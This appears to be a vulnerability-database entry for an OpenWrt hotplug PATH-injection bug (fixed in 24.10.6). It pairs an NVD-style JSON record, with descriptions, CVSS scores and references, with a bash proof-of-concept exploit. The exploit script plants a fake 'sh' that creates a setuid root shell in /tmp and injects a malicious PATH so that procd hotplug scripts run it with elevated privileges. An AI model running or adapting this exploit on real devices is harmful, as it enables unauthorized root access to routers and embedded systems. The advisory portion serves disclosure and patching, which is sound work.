CVE-2026-30874

#!/bin/bash # PoC for CVE-2026-30874: OpenWrt hotplug PATH injection # This script simulates how an attacker could exploit the strcmp bug to gain root privileges. # 1. Create a malicious directory and a payload (e.g., a fake netifd or sh) ATTACK_DIR="/tmp/exploit_cve_2026_30874" mkdir -p "$ATTACK_DIR" # Create a malicious binary that copies a root shell cat > "$ATTACK_DIR/sh" << 'EOF' #!/bin/sh cp /bin/sh /tmp/root_owned_shell chmod 4755 /tmp/root_owned_shell echo "PoC executed: Root shell available at /tmp/root_owned_shell" EOF chmod +x "$ATTACK_DIR/sh" # 2. Inject the malicious PATH # Exploit the strcmp vs strncmp bug: hotplug_call will not filter this. export PATH="$ATTACK_DIR:$PATH" echo "[+] Malicious PATH set to: $PATH" echo "[+] Waiting for a hotplug event (e.g., interface change) to trigger procd..." echo "[+] When a script in /etc/hotplug.d/ calls 'sh' without a full path, our payload runs." # In a real scenario, the attacker would wait for the system to trigger an event. # For demonstration, we can manually trigger a dummy hotplug event if possible, # or simply wait. The persistence of the PATH depends on the context. # This PoC demonstrates the environment variable setup required for the exploit.

{"cve": {"id": "CVE-2026-30874", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:43.847", "lastModified": "2026-03-23T19:26:05.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenWrt Project is a Linux operating system targeting embedded devices. In versions prior to 24.10.6, a vulnerability in the hotplug_call function allows an attacker to bypass environment variable filtering and inject an arbitrary PATH variable, potentially leading to privilege escalation. The function is intended to filter out sensitive environment variables like PATH when executing hotplug scripts in /etc/hotplug.d, but a bug using strcmp instead of strncmp causes the filter to compare the full environment string (e.g., PATH=/some/value) against the literal \"PATH\", so the match always fails. As a result, the PATH variable is never excluded, enabling an attacker to control which binaries are executed by procd-invoked scripts running with elevated privileges. This issue has been fixed in version 24.10.6."}, {"lang": "es", "value": "El Proyecto OpenWrt es un sistema operativo Linux dirigido a dispositivos embebidos. En versiones anteriores a la 24.10.6, una vulnerabilidad en la función hotplug_call permite a un atacante eludir el filtrado de variables de entorno e inyectar una variable PATH arbitraria, lo que podría conducir a una escalada de privilegios. La función está diseñada para filtrar variables de entorno sensibles como PATH al ejecutar scripts hotplug en /etc/hotplug.d, pero un error al usar strcmp en lugar de strncmp hace que el filtro compare la cadena de entorno completa (p. ej., PATH= /some /value) contra el literal 'PATH', por lo que la coincidencia siempre falla. Como resultado, la variable PATH nunca es excluida, lo que permite a un atacante controlar qué binarios son ejecutados por scripts invocados por procd que se ejecutan con privilegios elevados. Este problema ha sido solucionado en la versión 24.10.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-187"}, {"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.10.6", "matchCriteriaId": "12B5818C-BB4D-4486-9C53-7FCA8EF2EDA8"}]}]}], "references": [{"url": "https://github.com/openwrt/openwrt/security/advisories/GHSA-jw28-hxcm-j934", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/openwrt/procd/commit/e08cdc8562f55b9ac228a21f3f7605a18c522b81", "source": "[email protected]", "tags": ["Patch"]}]}}